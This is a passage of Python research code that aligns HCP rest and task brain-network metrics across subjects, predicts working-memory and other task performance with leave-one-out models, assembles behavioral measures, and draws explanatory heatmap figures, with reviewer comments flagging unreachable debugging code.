	scores = np.array(scores)
	# subject 142626 is excluded outright -- presumably flagged data; confirm
	scores[np.where(np.array(subjects).astype(int) == 142626)[0]] = np.nan
	return scores
def behavior(subjects):
	"""Assemble a per-subject behavioral/demographic feature DataFrame.

	Builds the four task-performance columns, merges them with the S900
	demographics table, restricts rows to `subjects` (order-checked), keeps a
	fixed set of behavioral measures, and mean-imputes missing values.

	Bug fixes vs the original:
	- `to_keep` was missing commas after 'InstruSupp_Unadj' and 'Taste_AgeAdj',
	  so implicit string concatenation silently produced the bogus names
	  'InstruSupp_UnadjPercStress_Unadj' and 'Taste_AgeAdjMars_Final',
	  dropping four intended columns. The commas are restored (and a duplicate
	  'PainInterf_Tscore' entry removed).
	- The nan check `a[a==True]` on an all-nan selection is always empty, so
	  the assert could never fire; it is removed and imputation kept.
	"""
	df = pd.read_csv('/%s/dynamic_mod/S900_Release_Subjects_Demographics.csv'%(homedir))
	task_perf = pd.DataFrame(columns=['WM','RELATIONAL','SOCIAL','LANGUAGE'])
	for task in task_perf.columns.values:
		task_perf[task] = task_performance(df.Subject.values,task)
	task_perf['Subject'] =df.Subject.values
	# task_perf = task_perf.dropna()
	fin = pd.merge(task_perf,df,how='outer',on='Subject')
	to_keep = ['MMSE_Score','PicSeq_AgeAdj','CardSort_AgeAdj','Flanker_AgeAdj','PMAT24_A_CR',\
	'ReadEng_AgeAdj','PicVocab_AgeAdj','ProcSpeed_AgeAdj','DDisc_AUC_40K','DDisc_AUC_200',\
	'SCPT_SEN','SCPT_SPEC','IWRD_TOT','ListSort_AgeAdj',\
	'ER40_CR','ER40ANG','ER40FEAR','ER40HAP','ER40NOE','ER40SAD',\
	'AngAffect_Unadj','AngHostil_Unadj','AngAggr_Unadj','FearAffect_Unadj','FearSomat_Unadj','Sadness_Unadj',\
	'LifeSatisf_Unadj','MeanPurp_Unadj','PosAffect_Unadj','Friendship_Unadj','Loneliness_Unadj',\
	'PercHostil_Unadj','PercReject_Unadj','EmotSupp_Unadj','InstruSupp_Unadj',\
	'PercStress_Unadj','SelfEff_Unadj','Endurance_AgeAdj','GaitSpeed_Comp','Dexterity_AgeAdj','Strength_AgeAdj',\
	'NEOFAC_A','NEOFAC_O','NEOFAC_C','NEOFAC_N','NEOFAC_E','PainInterf_Tscore','PainIntens_RawScore','Taste_AgeAdj',\
	'Mars_Final','PSQI_Score','VSPLOT_TC']
	# drop rows for subjects not requested; resulting order must match `subjects`
	for s in fin.Subject.values:
		if str(int(s)) not in subjects: fin.drop(fin[fin.Subject.values == s].index,axis=0,inplace=True)
	assert (np.array(fin.Subject.values) == np.array(subjects).astype(int)).all()
	for c in fin.columns:
		if c not in to_keep: fin = fin.drop(c,axis=1)
	# mean-impute remaining missing values, column by column
	for c in fin.columns:
		fin[c] = fin[c].fillna(fin[c].mean())
	return fin
def make_heatmap(data, cmap="RdBu_r", dmin=None, dmax=None):
	"""Map each value in data to an RGB color from a 1001-step palette.

	dmin/dmax optionally bound the normalization range: values beyond a bound
	are clamped; a bound wider than the data is appended as a sentinel so it
	anchors the scaling, then its color is dropped before returning.
	Returns a list of palette colors, one per input value.
	"""
	palette = sns.color_palette(cmap, n_colors=1001)
	values = np.array(copy.copy(data))
	added_min = False
	added_max = False
	if dmin != None:
		if dmin > np.min(values):
			values[values < dmin] = dmin
		else:
			values = np.append(values, dmin)
			added_min = True
	if dmax != None:
		if dmax < np.max(values):
			values[values > dmax] = dmax
		else:
			values = np.append(values, dmax)
			added_max = True
	# shift so the minimum sits at zero; the sign test uses the ORIGINAL data
	if np.nanmin(data) < 0.0:
		values = values + (np.nanmin(values) * -1)
	elif np.nanmin(data) > 0.0:
		values = values - (np.nanmin(values))
	# scale to integer palette indices 0..1000
	values = values / float(np.nanmax(values))
	values = values * 1000
	values = values.astype(int)
	colors = [palette[idx] for idx in values]
	# strip the colors that correspond to appended sentinel values
	if added_max: colors = colors[:-1]
	if added_min: colors = colors[:-1]
	return colors
def performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False,use_matrix=True,return_df=False):
    """
    For each HCP task, load rest- and task-session graph metrics, align the
    two subject lists, and (in the full pipeline) run leave-one-out prediction
    of task performance in a multiprocessing pool, accumulating per-node
    correlation dataframes (pc_df / wmd_df) and per-subject predictions (loo_df).

    NOTE(review): the run_version, tasks and atlas arguments are overwritten by
    hard-coded values just below, and the bare 'continue' in the task loop makes
    everything after the subject-count printouts unreachable -- as written the
    function only prints subject-overlap counts. Looks like committed debugging
    state; confirm before relying on the return value.
    """
    # Drop any pool bound in this scope, then build a fresh one leaving one core free.
    try: del pool
    except: pass
    pool = Pool(multiprocessing.cpu_count()-1)
    run_version = 'fz' # NOTE(review): shadows the run_version parameter
    # control_com=False
    # control_motion=False
    # use_matrix = True
    tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'] # NOTE(review): shadows the tasks parameter
    atlas='power' # NOTE(review): shadows the atlas parameter
    loo_columns= ['Task','Predicted Performance','Performance']
    loo_df = pd.DataFrame(columns = loo_columns)
    pc_df = pd.DataFrame(columns=['Task','Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient'])
    wmd_df = pd.DataFrame(columns=['Task','Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient'])
    total_subs = np.array([])
    for task in tasks:
        """
        preprocessing
        """
        print task.capitalize()
        # Rest-session subject list and graph metrics for this atlas/version.
        rest_subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%('REST',atlas,run_version))
        rest_results = graph_metrics(rest_subjects,'REST',atlas,run_version=run_version)
        rest_subject_pcs = rest_results['subject_pcs'].copy()
        rest_matrices = rest_results['matrices']
        rest_subject_mods = rest_results['subject_mods']
        rest_subject_wmds = rest_results['subject_wmds']
        rest_subjects = rest_results['subjects']
        # Task-session subject list and graph metrics.
        subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%(task,atlas,run_version))
        static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
        subject_pcs = static_results['subject_pcs'].copy()
        subject_wmds = static_results['subject_wmds']
        matrices = static_results['matrices']
        subject_mods = static_results['subject_mods']
        subject_communities = static_results['subject_communities']
        subjects = static_results['subjects']
        # Keep only subjects present in both sessions, building index lists
        # that put the rest and task arrays into the same subject order.
        all_subs = np.intersect1d(rest_subjects,subjects)
        rest_idx = []
        task_idx = []
        for s in all_subs:
            rest_idx.append(np.where(rest_subjects == s)[0][0])
            task_idx.append(np.where(subjects == s)[0][0])
        assert (rest_subjects[rest_idx] == subjects[task_idx]).all()
        subjects = all_subs
        print len(np.unique(subjects)),len(subjects)
        total_subs = np.append(total_subs,subjects.copy())
        print len(np.unique(np.array(total_subs).flatten()))
        continue # NOTE(review): makes the remainder of this loop body unreachable
        # --- unreachable below (because of the 'continue' above) ---
        # Re-order every metric array to the shared subject order.
        rest_subject_pcs = rest_subject_pcs[rest_idx]
        rest_subject_wmds = rest_subject_wmds[rest_idx]
        rest_subject_mods = rest_subject_mods[rest_idx]
        rest_matrices= rest_matrices[rest_idx]
        subject_pcs = subject_pcs[task_idx]
        subject_wmds = subject_wmds[task_idx]
        subject_mods = subject_mods[task_idx]
        matrices = matrices[task_idx]
        subject_communities = subject_communities[task_idx]
        # Drop subjects without a performance score for this task.
        task_perf = task_performance(np.array(subjects).astype(int),task)
        to_delete = np.isnan(task_perf).copy()
        to_delete = np.where(to_delete==True)
        task_perf = np.delete(task_perf,to_delete)
        subjects = np.delete(subjects,to_delete)
        if control_motion == True:
            subject_motion = []
            for subject in subjects:
                subject_motion.append(get_sub_motion(subject,task))
            assert np.min(subject_motion) > 0.0
            subject_motion = np.array(subject_motion)
        subject_pcs = np.delete(subject_pcs,to_delete,axis=0)
        subject_mods = np.delete(subject_mods,to_delete)
        subject_wmds = np.delete(subject_wmds,to_delete,axis=0)
        matrices = np.delete(matrices,to_delete,axis=0)
        subject_communities = np.delete(subject_communities,to_delete)
        rest_subject_pcs = np.delete(rest_subject_pcs,to_delete,axis=0)
        rest_subject_wmds = np.delete(rest_subject_wmds,to_delete,axis=0)
        rest_subject_mods = np.delete(rest_subject_mods,to_delete,axis=0)
        rest_matrices = np.delete(rest_matrices,to_delete,axis=0)
        # Zero out NaN nodal metrics so correlations below are defined.
        subject_pcs[np.isnan(subject_pcs)] = 0.0
        rest_subject_pcs[np.isnan(rest_subject_pcs)] = 0.0
        rest_subject_wmds[np.isnan(rest_subject_wmds)] = 0.0
        subject_wmds[np.isnan(subject_wmds)] = 0.0
        # Optionally regress motion and/or community count out of performance,
        # keeping the GLM residuals as the new performance scores.
        if control_com == True and control_motion == True:
            model_vars = np.array([subject_motion,subject_communities]).transpose()
            task_perf = sm.GLM(task_perf,sm.add_constant(model_vars)).fit().resid_response
            assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
            assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
        if control_com == True and control_motion == False:
            task_perf = sm.GLM(task_perf,sm.add_constant(subject_communities)).fit().resid_response
            assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
        if control_com == False and control_motion == True:
            task_perf = sm.GLM(task_perf,sm.add_constant(subject_motion)).fit().resid_response
            assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
        assert subject_pcs.shape[0] == len(subjects)
        # Per-node correlation of performance with PC and with WMD across subjects.
        task_pc_corr = np.zeros(subject_pcs.shape[1])
        for i in range(len(task_pc_corr)):
            task_pc_corr[i] = nan_pearsonr(task_perf,subject_pcs[:,i])[0]
        task_wmd_corr = np.zeros(subject_pcs.shape[1])
        for i in range(len(task_pc_corr)):
            task_wmd_corr[i] = nan_pearsonr(task_perf,subject_wmds[:,i])[0]
        task_str = np.zeros((len(task_pc_corr))).astype(str)
        task_str[:] = task.capitalize()
        pc_df = pc_df.append(pd.DataFrame(np.array([task_str,np.nanmean(subject_pcs,axis=0),task_pc_corr]).transpose(),columns=['Task','Mean Participation Coefficient','Diversity Facilitated Performance Coefficient']),ignore_index=True)
        wmd_df = wmd_df.append(pd.DataFrame(np.array([task_str,np.nanmean(subject_wmds,axis=0),task_wmd_corr]).transpose(),columns=['Task','Mean Within-Community-Strength','Locality Facilitated Performance Coefficient']),ignore_index=True)
        if return_df:
            continue
        """
        prediction / cross validation
        """
        # Leave-one-out: one job per held-out subject, mapped over the pool.
        vs = []
        for t in range(len(task_perf)):
            vs.append([subject_pcs,subject_wmds,subject_mods,rest_subject_pcs,rest_subject_wmds,rest_subject_mods,task_perf,t,matrices,rest_matrices,False,use_matrix])
        nodal_prediction = pool.map(super_edge_predict_new,vs)
        result = pearsonr(np.array(nodal_prediction).reshape(-1),task_perf)
        print 'Prediction of Performance: ', result
        sys.stdout.flush()
        loo_array = []
        for i in range(len(nodal_prediction)):
            loo_array.append([task,nodal_prediction[i],task_perf[i]])
        loo_df = pd.concat([loo_df,pd.DataFrame(loo_array,columns=loo_columns)],axis=0)
    # plot_results(loo_df,'Predicted Performance','Performance','/home/despoB/mb3152/dynamic_mod/figures/Predicted_Performance_%s_%s_%s.pdf'%(run_version,control_motion,use_matrix))
    if return_df:return pc_df,wmd_df
def performance_across_traits(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False):
    """
    For each HCP task: align rest/task graph metrics across shared subjects,
    build a leave-one-out task-performance model, then (in the full pipeline)
    test how well the same features generalize to each behavioral measure,
    writing feature-correlation and prediction-accuracy CSVs.

    NOTE(review): every keyword argument is overwritten by a hard-coded value
    below, and the bare 'continue' after 'fin = behavior(subjects)' makes the
    whole generalization section unreachable -- as written the function writes
    two empty dataframes to CSV. Looks like committed debugging state.
    """
    # Drop any pool bound in this scope, then build a fresh one leaving one core free.
    try: del pool
    except: pass
    pool = Pool(multiprocessing.cpu_count()-1)
    atlas = 'power' # NOTE(review): shadows the atlas parameter
    run_version = 'fz' # NOTE(review): shadows the run_version parameter
    control_com=False # NOTE(review): shadows the control_com parameter
    control_motion=False # NOTE(review): shadows the control_motion parameter
    tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'] # NOTE(review): shadows the tasks parameter
    project='hcp'
    atlas='power'
    behavior_df = pd.DataFrame(columns=['Task','Behavioral Measure','Prediction Accuracy','p'])
    prediction_df = pd.DataFrame(columns=['Task','Behavioral Measure','Prediction Accuracy','p'])
    for task in tasks:
        """
        preprocessing
        """
        print task.capitalize()
        # Rest-session subject list and graph metrics for this atlas/version.
        rest_subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%('REST',atlas,run_version))
        rest_results = graph_metrics(rest_subjects,'REST',atlas,run_version=run_version)
        rest_subject_pcs = rest_results['subject_pcs'].copy()
        rest_matrices = rest_results['matrices']
        rest_subject_mods = rest_results['subject_mods']
        rest_subject_wmds = rest_results['subject_wmds']
        rest_subjects = rest_results['subjects']
        # Task-session subject list and graph metrics.
        subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%(task,atlas,run_version))
        static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
        subject_pcs = static_results['subject_pcs'].copy()
        subject_wmds = static_results['subject_wmds']
        matrices = static_results['matrices']
        subject_mods = static_results['subject_mods']
        subject_communities = static_results['subject_communities']
        subjects = static_results['subjects']
        # Keep only subjects present in both sessions, in a shared order.
        all_subs = np.intersect1d(rest_subjects,subjects)
        rest_idx = []
        task_idx = []
        for s in all_subs:
            rest_idx.append(np.where(rest_subjects == s)[0][0])
            task_idx.append(np.where(subjects == s)[0][0])
        assert (rest_subjects[rest_idx] == subjects[task_idx]).all()
        subjects = all_subs
        rest_subject_pcs = rest_subject_pcs[rest_idx]
        rest_subject_wmds = rest_subject_wmds[rest_idx]
        rest_subject_mods = rest_subject_mods[rest_idx]
        rest_matrices= rest_matrices[rest_idx]
        subject_pcs = subject_pcs[task_idx]
        subject_wmds = subject_wmds[task_idx]
        subject_mods = subject_mods[task_idx]
        matrices = matrices[task_idx]
        subject_communities = subject_communities[task_idx]
        # Drop subjects without a performance score for this task.
        task_perf = task_performance(np.array(subjects).astype(int),task)
        to_delete = np.isnan(task_perf).copy()
        to_delete = np.where(to_delete==True)
        task_perf = np.delete(task_perf,to_delete)
        subjects = np.delete(subjects,to_delete)
        if control_motion == True:
            subject_motion = []
            for subject in subjects:
                subject_motion.append(get_sub_motion(subject,task))
            assert np.min(subject_motion) > 0.0
            subject_motion = np.array(subject_motion)
        subject_pcs = np.delete(subject_pcs,to_delete,axis=0)
        subject_mods = np.delete(subject_mods,to_delete)
        subject_wmds = np.delete(subject_wmds,to_delete,axis=0)
        matrices = np.delete(matrices,to_delete,axis=0)
        subject_communities = np.delete(subject_communities,to_delete)
        rest_subject_pcs = np.delete(rest_subject_pcs,to_delete,axis=0)
        rest_subject_wmds = np.delete(rest_subject_wmds,to_delete,axis=0)
        rest_subject_mods = np.delete(rest_subject_mods,to_delete,axis=0)
        rest_matrices = np.delete(rest_matrices,to_delete,axis=0)
        # Zero out NaN nodal metrics so correlations below are defined.
        subject_pcs[np.isnan(subject_pcs)] = 0.0
        rest_subject_pcs[np.isnan(rest_subject_pcs)] = 0.0
        subject_wmds[np.isnan(subject_wmds)] = 0.0
        # Optionally regress motion and/or community count out of performance,
        # keeping the GLM residuals as the new performance scores.
        if control_com == True and control_motion == True:
            model_vars = np.array([subject_motion,subject_communities]).transpose()
            task_perf = sm.GLM(task_perf,sm.add_constant(model_vars)).fit().resid_response
            assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
            assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
        if control_com == True and control_motion == False:
            task_perf = sm.GLM(task_perf,sm.add_constant(subject_communities)).fit().resid_response
            assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
        if control_com == False and control_motion == True:
            task_perf = sm.GLM(task_perf,sm.add_constant(subject_motion)).fit().resid_response
            assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
        assert subject_pcs.shape[0] == len(subjects)
        """
        generalize features to behavioral measures
        """
        fin = behavior(subjects)
        continue # NOTE(review): makes the remainder of this loop body unreachable
        # --- unreachable below (because of the 'continue' above) ---
        # Human-readable labels for the HCP behavioral column names.
        translation = {'Loneliness_Unadj': 'Lonelisness','PercReject_Unadj':'Percieved Rejection','AngHostil_Unadj':'Hostility','Sadness_Unadj':'Sadness','PercHostil_Unadj':'Percieved Hostility','NEOFAC_N':'Neuroticism',\
        'FearAffect_Unadj':'Fear','AngAggr_Unadj':'Agressive Anger','PainInterf_Tscore':'Pain Interferes With Daily Life','Strength_AgeAdj':'Physical Strength','FearSomat_Unadj':'Somatic Fear','PSQI_Score':'Poor Sleep',\
        'SCPT_SPEC':'Sustained Attention Specificity','SCPT_SEN':'Sustained Attention Sensativity','ER40HAP':'Emotion, Happy Identifications','DDisc_AUC_200':'Delay Discounting:$200',\
        'GaitSpeed_Comp':'Gait Speed','DDisc_AUC_40K':'Delay Discounting: $40,000','ER40NOE':'Emotion, Neutral Identifications','ER40ANG':'Emotion, Angry Identifications',\
        'ER40FEAR':'Emotion, Fearful Identifications','ER40SAD':'Emotion, Sad Identifications','ER40_CR':'Emotion Recognition','MMSE_Score':'Mini Mental Status Exam','NEOFAC_O':'Openness','IWRD_TOT':'Verbal Memory','PMAT24_A_CR':'Penn Matrix','NEOFAC_C':'Conscientiousness',\
        'NEOFAC_A':'Agreeableness','Flanker_AgeAdj':'Flanker Task','CardSort_AgeAdj':'Card Sorting Task','NEOFAC_E':'Extraversion','Dexterity_AgeAdj':'Dexterity','Endurance_AgeAdj':'Endurance','ReadEng_AgeAdj':'Oral Reading Recognition',\
        'PicVocab_AgeAdj':'Picture Vocabulary','ProcSpeed_AgeAdj':'Processing Speed','SelfEff_Unadj':'Percieved Stress','PosAffect_Unadj':'Positive Affect','MeanPurp_Unadj':'Meaning and Purpose','Friendship_Unadj':'Friendship',\
        'PicSeq_AgeAdj':'Picture Sequence Memory','LifeSatisf_Unadj':'Life Satisfaction','EmotSupp_Unadj':'Emotional Support','ListSort_AgeAdj':'Working Memory','VSPLOT_TC':'Spatial','AngAffect_Unadj':'Anger, Affect'}
        # Leave-one-out models trained on task performance; last element of each
        # result is the prediction, the rest are the model features/weights.
        vs = []
        for t in range(len(task_perf)):
            vs.append([subject_pcs,subject_wmds,subject_mods,rest_subject_pcs,rest_subject_wmds,rest_subject_mods,task_perf,t,matrices,rest_matrices,True,True])
        task_model_results = pool.map(super_edge_predict_new,vs)
        task_model = []
        for idx in range(len(task_model_results)):
            task_model.append(task_model_results[idx][:-1])
        task_model = np.array(task_model)
        # For every behavioral column: fit the same LOO models to that measure
        # and compare its feature weights / predictions with the task model.
        for i in range(fin.shape[1]):
            behav_perf = fin[fin.columns.values[i]]
            vs = []
            for t in range(len(task_perf)):
                vs.append([subject_pcs,subject_wmds,subject_mods,rest_subject_pcs,rest_subject_wmds,rest_subject_mods,behav_perf,t,matrices,rest_matrices,True,True])
            behav_model_results = pool.map(super_edge_predict_new,vs)
            behav_model = []
            behav_prediction = []
            for idx in range(len(behav_model_results)):
                behav_model.append(behav_model_results[idx][:-1])
                behav_prediction.append(behav_model_results[idx][-1])
            behav_model = np.array(behav_model)
            behav_prediction = np.array(behav_prediction)
            # Feature-wise correlation between the behavior model and the task model.
            fits = []
            pvals = []
            for feat in range(behav_model.shape[2]):
                fits.append(pearsonr(np.array(behav_model)[:,0,feat],np.array(task_model)[:,0,feat])[0])
                pvals.append(pearsonr(np.array(behav_model)[:,0,feat],np.array(task_model)[:,0,feat])[1])
            behavior_df = behavior_df.append(pd.DataFrame(np.array([task,translation[fin.columns.values[i]],np.mean(fits[:-2]),np.mean(pvals[:-2])]).reshape(1,4),columns=['Task','Behavioral Measure','Prediction Accuracy','p']),ignore_index=True)
            result,p = pearsonr(behav_prediction,behav_perf)
            prediction_df = prediction_df.append(pd.DataFrame(np.array([task,translation[fin.columns.values[i]],result,p]).reshape(1,4),columns=['Task','Behavioral Measure','Prediction Accuracy','p']),ignore_index=True)
    behavior_df.to_csv('/home/despoB/mb3152/dynamic_mod/feature_corr.csv')
    prediction_df.to_csv('/home/despoB/mb3152/dynamic_mod/feature_behav_predict.csv')
    # plot(behavior_df,savestr,colormap='coolwarm')
    # plot(prediction_df,savestr,colormap='coolwarm')
    # tasks = ['LANGUAGE','RELATIONAL','SOCIAL','WM']
    # m = np.zeros((4,4))
    # for i,t1 in enumerate(tasks):
    # 	for j,t2 in enumerate(tasks):
    # 		m[i,j] = pearsonr(df['Prediction Accuracy'][df.Task==t1],df['Prediction Accuracy'][df.Task==t2])[0]
    # 		m[j,i] = pearsonr(df['Prediction Accuracy'][df.Task==t1],df['Prediction Accuracy'][df.Task==t2])[0]
    # tasks = ['Language','Relational','Social','Working Memory']
    # np.fill_diagonal(m,np.nan)
    # sns.heatmap(m)
    # sns.plt.xticks(range(4),tasks,rotation=90)
    # tasks.reverse()
    # sns.plt.yticks(range(4),tasks,rotation=360)
    # sns.plt.tight_layout()
    # sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/feature_corr_corr.pdf')
    # sns.plt.show()
def nn_workflow_figure():
    """
    Build the illustration figures for the neural-network prediction workflow,
    using the WM task only: (1) heatmaps of PC values against modularity and
    against performance with their correlation coefficients, (2) the feature
    heatmap fed to the model, and (3) a trained MLPRegressor exported as a GML
    graph ('neural_network_new.gml') for network visualization.

    Side effects: reads result .npy files from disk, writes three PDFs and one
    GML file, and calls plt.show() for each figure.
    """
    run_version = 'fz'
    control_com=False
    control_motion=False
    use_matrix = True
    atlas='power'
    loo_columns= ['Task','Predicted Performance','Performance']
    loo_df = pd.DataFrame(columns = loo_columns)
    pc_df = pd.DataFrame(columns=['Task','Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient'])
    wmd_df = pd.DataFrame(columns=['Task','Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient'])
    total_subs = np.array([])
    task = 'WM'
    """
    preprocessing
    """
    print task.capitalize()
    # Rest-session subject list and graph metrics.
    rest_subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%('REST',atlas,run_version))
    rest_results = graph_metrics(rest_subjects,'REST',atlas,run_version=run_version)
    rest_subject_pcs = rest_results['subject_pcs'].copy()
    rest_matrices = rest_results['matrices']
    rest_subject_mods = rest_results['subject_mods']
    rest_subject_wmds = rest_results['subject_wmds']
    rest_subjects = rest_results['subjects']
    # WM-task subject list and graph metrics.
    subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_%s.npy'%(task,atlas,run_version))
    static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
    subject_pcs = static_results['subject_pcs'].copy()
    subject_wmds = static_results['subject_wmds']
    matrices = static_results['matrices']
    subject_mods = static_results['subject_mods']
    subject_communities = static_results['subject_communities']
    subjects = static_results['subjects']
    # Keep only subjects present in both sessions, in a shared order.
    all_subs = np.intersect1d(rest_subjects,subjects)
    rest_idx = []
    task_idx = []
    for s in all_subs:
        rest_idx.append(np.where(rest_subjects == s)[0][0])
        task_idx.append(np.where(subjects == s)[0][0])
    assert (rest_subjects[rest_idx] == subjects[task_idx]).all()
    subjects = all_subs
    print len(np.unique(subjects)),len(subjects)
    total_subs = np.append(total_subs,subjects.copy())
    print len(np.unique(np.array(total_subs).flatten()))
    rest_subject_pcs = rest_subject_pcs[rest_idx]
    rest_subject_wmds = rest_subject_wmds[rest_idx]
    rest_subject_mods = rest_subject_mods[rest_idx]
    rest_matrices= rest_matrices[rest_idx]
    subject_pcs = subject_pcs[task_idx]
    subject_wmds = subject_wmds[task_idx]
    subject_mods = subject_mods[task_idx]
    matrices = matrices[task_idx]
    subject_communities = subject_communities[task_idx]
    # Drop subjects without a WM performance score.
    task_perf = task_performance(np.array(subjects).astype(int),task)
    to_delete = np.isnan(task_perf).copy()
    to_delete = np.where(to_delete==True)
    task_perf = np.delete(task_perf,to_delete)
    subjects = np.delete(subjects,to_delete)
    if control_motion == True:
        subject_motion = []
        for subject in subjects:
            subject_motion.append(get_sub_motion(subject,task))
        assert np.min(subject_motion) > 0.0
        subject_motion = np.array(subject_motion)
    subject_pcs = np.delete(subject_pcs,to_delete,axis=0)
    subject_mods = np.delete(subject_mods,to_delete)
    subject_wmds = np.delete(subject_wmds,to_delete,axis=0)
    matrices = np.delete(matrices,to_delete,axis=0)
    subject_communities = np.delete(subject_communities,to_delete)
    rest_subject_pcs = np.delete(rest_subject_pcs,to_delete,axis=0)
    rest_subject_wmds = np.delete(rest_subject_wmds,to_delete,axis=0)
    rest_subject_mods = np.delete(rest_subject_mods,to_delete,axis=0)
    rest_matrices = np.delete(rest_matrices,to_delete,axis=0)
    # Zero out NaN nodal metrics so correlations below are defined.
    subject_pcs[np.isnan(subject_pcs)] = 0.0
    rest_subject_pcs[np.isnan(rest_subject_pcs)] = 0.0
    rest_subject_wmds[np.isnan(rest_subject_wmds)] = 0.0
    subject_wmds[np.isnan(subject_wmds)] = 0.0
    # Optionally regress motion and/or community count out of performance.
    if control_com == True and control_motion == True:
        model_vars = np.array([subject_motion,subject_communities]).transpose()
        task_perf = sm.GLM(task_perf,sm.add_constant(model_vars)).fit().resid_response
        assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
        assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
    if control_com == True and control_motion == False:
        task_perf = sm.GLM(task_perf,sm.add_constant(subject_communities)).fit().resid_response
        assert np.isclose(0.0,pearsonr(task_perf,subject_communities)[0]) == True
    if control_com == False and control_motion == True:
        task_perf = sm.GLM(task_perf,sm.add_constant(subject_motion)).fit().resid_response
        assert np.isclose(0.0,pearsonr(task_perf,subject_motion)[0]) == True
    assert subject_pcs.shape[0] == len(subjects)
    # Per-node correlations: PC vs performance, PC vs modularity, WMD vs performance.
    task_pc_corr = np.zeros(subject_pcs.shape[1])
    for i in range(len(task_pc_corr)):
        task_pc_corr[i] = nan_pearsonr(task_perf,subject_pcs[:,i])[0]
    task_mod_corr = np.zeros(subject_pcs.shape[1])
    for i in range(len(task_pc_corr)):
        task_mod_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
    task_wmd_corr = np.zeros(subject_pcs.shape[1])
    for i in range(len(task_pc_corr)):
        task_wmd_corr[i] = nan_pearsonr(task_perf,subject_wmds[:,i])[0]
    task_str = np.zeros((len(task_pc_corr))).astype(str)
    task_str[:] = task.capitalize()
    # Per-subject similarity of the PC profile to the performance-correlation map.
    task_pc = np.zeros(subject_pcs.shape[0])
    for s in range(subject_pcs.shape[0]):
        task_pc[s] = nan_pearsonr(subject_pcs[s],task_pc_corr)[0]
    """
    make pc value array,modularity array, and coefficeints
    pick linearly from lowest to stronest coeff
    """
    # Figure 1: 30 subjects (sorted by modularity) x 10 nodes (sorted by
    # PC-modularity coefficient), with the coefficients as a side column.
    sns.set(style='white',context="paper",font='Helvetica')
    plot_pc_coef_values = subject_pcs[np.argsort(subject_mods)[np.linspace(0,subject_mods.shape[0]-1,30).astype(int)]][:,np.argsort(task_mod_corr)[np.linspace(0,task_mod_corr.shape[0]-1,10).astype(int)]].transpose()
    plot_task_perf = subject_mods[np.argsort(subject_mods)[np.linspace(0,subject_mods.shape[0]-1,30).astype(int)]]
    # sns.heatmap([plot_task_perf,plot_task_perf],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),ax=axes[1],cbar=False)
    arr1 = plot_pc_coef_values
    arr2 = [plot_task_perf,]
    fig, axes = plt.subplots(2, 2,gridspec_kw={'height_ratios': [10,1,10,1], 'width_ratios': [10, .5,], 'wspace': 0.25}, sharex='col')
    # h1=sns.heatmap(arr1, ax=axes[0][0], cbar_ax=axes[0][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
    h1=sns.heatmap(arr1, ax=axes[0][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
    h1.set_xlabel("subjects' participation coefficients")
    h1.set_ylabel('nodes')
    h1.set_yticklabels(h1.get_yticklabels(),rotation=360)
    h1.set_xticks([],[])
    # h2=sns.heatmap(arr2, ax=axes[1][0], cbar_ax=axes[1][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
    h2=sns.heatmap(arr2, ax=axes[1][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
    h2.set_xlabel("subjects' modularity")
    h2.set_yticks([],[])
    h2.set_xticks([],[])
    # plt.savefig('task_perf_corr_exp.pdf')
    plot_coefs = task_mod_corr[np.argsort(task_mod_corr)[np.linspace(0,task_mod_corr.shape[0]-1,10).astype(int)]]
    h3= sns.heatmap(plot_coefs.reshape(10,1),annot=True, fmt='.2f',ax=axes[0][1],cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True))
    # h3.set_xlabel("subjects' participation coefficients")
    h3.set_ylabel('diversity facilitated\nmodularity coefficient')
    h3.set_yticklabels(h1.get_yticklabels(),rotation=360)
    h3.set_xticks([],[])
    axes[1][1].set_visible(False)
    plt.savefig('pc_mod_corr_exp.pdf')
    plt.show()
    """
    make pc value array,performance array, and coefficeints
    pick linearly from lowest to stronest coeff
    """
    # Figure 2: same layout, but subjects sorted by WM performance and nodes
    # by the PC-performance coefficient.
    sns.set(style='white',context="paper",font='Helvetica')
